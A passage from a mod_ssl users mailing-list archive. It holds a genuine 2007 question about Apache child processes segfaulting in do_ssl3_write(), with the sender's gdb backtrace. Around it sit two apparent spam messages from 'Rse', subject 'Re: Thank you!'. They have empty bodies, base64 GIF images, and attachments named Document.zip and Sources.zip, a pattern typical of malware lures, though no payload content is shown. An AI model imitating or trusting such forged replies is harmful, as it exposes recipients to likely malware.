mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 21 14:32:09 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4940314D876; Wed, 21 Feb 2007 14:32:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.169])
	by master.modssl.org (Postfix) with ESMTP id B5EAC14D82F
	for ; Wed, 21 Feb 2007 14:32:08 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id 80so1551137ugb
        for ; Wed, 21 Feb 2007 05:31:37 -0800 (PST)
Received: by 10.78.149.15 with SMTP id w15mr497857hud.1172064696018;
        Wed, 21 Feb 2007 05:31:36 -0800 (PST)
Received: by 10.78.45.15 with HTTP; Wed, 21 Feb 2007 05:31:35 -0800 (PST)
Message-ID: <6f3834b40702210531o74dfd2e6hd4fab898eaabbf0@mail.gmail.com>
Date: Wed, 21 Feb 2007 15:31:35 +0200
From: "Klexx BullDogs" 
To: modssl-users@modssl.org
Subject: httpd signal 11, Segmentation fault and mod_ssl
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_7378_21661896.1172064695980"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Klexx BullDogs" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_7378_21661896.1172064695980
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Good day for all. Ive got newly installed linux box with APACHE
1.3.27PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.8d
Some times in a day in httpd error_log appears lines
     child pid *****  exit signal Segmentation fault (11)
I decided to get a core dump.
After using gdb utility, i've got the following output
gdb /opt/apache/bin/httpd  /tmp/core.2019
GNU gdb Red Hat Linux (6.5-8.fc6rh)
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols
found)
Using host libthread_db library "/lib/libthread_db.so.1".


warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libm.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libcrypt.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /usr/lib/libgdbm.so.2...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libgdbm.so.2
Reading symbols from /lib/libexpat.so.0...(no debugging symbols
found)...done.
Loaded symbols for /lib/libexpat.so.0
Reading symbols from /lib/libdl.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnss_files.so.2
Reading symbols from /opt/apache/libexec/libphp4.so...done.
Loaded symbols for /opt/apache/libexec/libphp4.so
Reading symbols from /usr/lib/libpng12.so.0...done.
Loaded symbols for /usr/lib/libpng12.so.0
Reading symbols from /usr/lib/libz.so.1...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /usr/lib/libjpeg.so.62...done.
Loaded symbols for /usr/lib/libjpeg.so.62
Reading symbols from /usr/lib/libcurl.so.3...done.
Loaded symbols for /usr/lib/libcurl.so.3
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /usr/lib/libgssapi_krb5.so.2...done.
Loaded symbols for /usr/lib/libgssapi_krb5.so.2
Reading symbols from /usr/lib/libkrb5.so.3...done.
Loaded symbols for /usr/lib/libkrb5.so.3
Reading symbols from /usr/lib/libk5crypto.so.3...done.
Loaded symbols for /usr/lib/libk5crypto.so.3
Reading symbols from /lib/libcom_err.so.2...done.
Loaded symbols for /lib/libcom_err.so.2
Reading symbols from /usr/lib/libidn.so.11...done.
Loaded symbols for /usr/lib/libidn.so.11
Reading symbols from /lib/libssl.so.6...done.
Loaded symbols for /lib/libssl.so.6
Reading symbols from /lib/libcrypto.so.6...done.
Loaded symbols for /lib/libcrypto.so.6
Reading symbols from /usr/lib/libkrb5support.so.0...done.
Loaded symbols for /usr/lib/libkrb5support.so.0
Reading symbols from /usr/local/Zend/lib/ZendExtensionManager.so...done.
Loaded symbols for /usr/local/Zend/lib/ZendExtensionManager.so
Reading symbols from /usr/local/Zend/lib/Optimizer-3.2.0/php-4.4.x
/ZendOptimizer.so...done.
Loaded symbols for /usr/local/Zend/lib/Optimizer-3.2.0/php-4.4.x
/ZendOptimizer.so
Failed to read a valid object file image from memory.
Core was generated by `/opt/apache/bin/httpd -DSSL'.
Program terminated with signal 11, Segmentation fault.
#0  0x08101ea1 in do_ssl3_write ()
(gdb) bt full
#0  0x08101ea1 in do_ssl3_write ()
No symbol table info available.
#1  0x08101e9e in do_ssl3_write ()
No symbol table info available.
#2  0x00000010 in ?? ()
No symbol table info available.
#3  0x082fb5b8 in ?? ()
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.

As you see segfault was at function do_ssl3_write ()
The next step is to identify this problem. What it could be?
Thanks in advance!!

------=_Part_7378_21661896.1172064695980
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Good day for all. Ive got newly installed linux box with APACHE 1.3.27 PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.8d  
Some times in a day in httpd error_log appears lines
     child pid *****  exit signal Segmentation fault (11)

I decided to get a core dump. 
After using gdb utility, i've got the following output
gdb /opt/apache/bin/httpd  /tmp/core.2019
GNU gdb Red Hat Linux (6.5-8.fc6rh)
Copyright (C) 2006 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".



warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libm.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libcrypt.so.1...(no debugging symbols found)...done.

Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /usr/lib/libgdbm.so.2...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libgdbm.so.2
Reading symbols from /lib/libexpat.so.0...(no debugging symbols found)...done.

Loaded symbols for /lib/libexpat.so.0
Reading symbols from /lib/libdl.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...
(no debugging symbols found)...done.

Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...(no debugging symbols found)...done.

Loaded symbols for /lib/libnss_files.so.2
Reading symbols from /opt/apache/libexec/libphp4.so...done.
Loaded symbols for /opt/apache/libexec/libphp4.so
Reading symbols from /usr/lib/libpng12.so.0...done.
Loaded symbols for /usr/lib/libpng12.so.0

Reading symbols from /usr/lib/libz.so.1...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /usr/lib/libjpeg.so.62...done.
Loaded symbols for /usr/lib/libjpeg.so.62
Reading symbols from /usr/lib/libcurl.so.3...done.

Loaded symbols for /usr/lib/libcurl.so.3
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1

Reading symbols from /usr/lib/libgssapi_krb5.so.2...done.
Loaded symbols for /usr/lib/libgssapi_krb5.so.2
Reading symbols from /usr/lib/libkrb5.so.3...done.
Loaded symbols for /usr/lib/libkrb5.so.3
Reading symbols from /usr/lib/libk5crypto.so.3...done.

Loaded symbols for /usr/lib/libk5crypto.so.3
Reading symbols from /lib/libcom_err.so.2...done.
Loaded symbols for /lib/libcom_err.so.2
Reading symbols from /usr/lib/libidn.so.11...done.
Loaded symbols for /usr/lib/libidn.so.11

Reading symbols from /lib/libssl.so.6...done.
Loaded symbols for /lib/libssl.so.6
Reading symbols from /lib/libcrypto.so.6...done.
Loaded symbols for /lib/libcrypto.so.6
Reading symbols from /usr/lib/libkrb5support.so.0...done.

Loaded symbols for /usr/lib/libkrb5support.so.0
Reading symbols from /usr/local/Zend/lib/ZendExtensionManager.so...done.
Loaded symbols for /usr/local/Zend/lib/ZendExtensionManager.so
Reading symbols from /usr/local/Zend/lib/Optimizer-
3.2.0/php-4.4.x/ZendOptimizer.so...done.
Loaded symbols for /usr/local/Zend/lib/Optimizer-3.2.0/php-4.4.x/ZendOptimizer.so
Failed to read a valid object file image from memory.
Core was generated by `/opt/apache/bin/httpd -DSSL'.

Program terminated with signal 11, Segmentation fault.
#0  0x08101ea1 in do_ssl3_write ()
(gdb) bt full
#0  0x08101ea1 in do_ssl3_write ()
No symbol table info available.
#1  0x08101e9e in do_ssl3_write ()

No symbol table info available.
#2  0x00000010 in ?? ()
No symbol table info available.
#3  0x082fb5b8 in ?? ()
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.


As you see segfault was at function do_ssl3_write ()
The next step is to identify this problem. What it could be?
Thanks in advance!!




------=_Part_7378_21661896.1172064695980--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 21 15:59:59 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6AF1F14D876; Wed, 21 Feb 2007 15:59:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id E4E8614D82F
	for ; Wed, 21 Feb 2007 15:59:58 +0100 (CET)
Date: Wed, 21 Feb 2007 10:12:53 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 21 22:44:43 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C533914D86D; Wed, 21 Feb 2007 22:44:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 3370914D82F
	for ; Wed, 21 Feb 2007 22:44:42 +0100 (CET)
Date: Wed, 21 Feb 2007 16:57:39 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
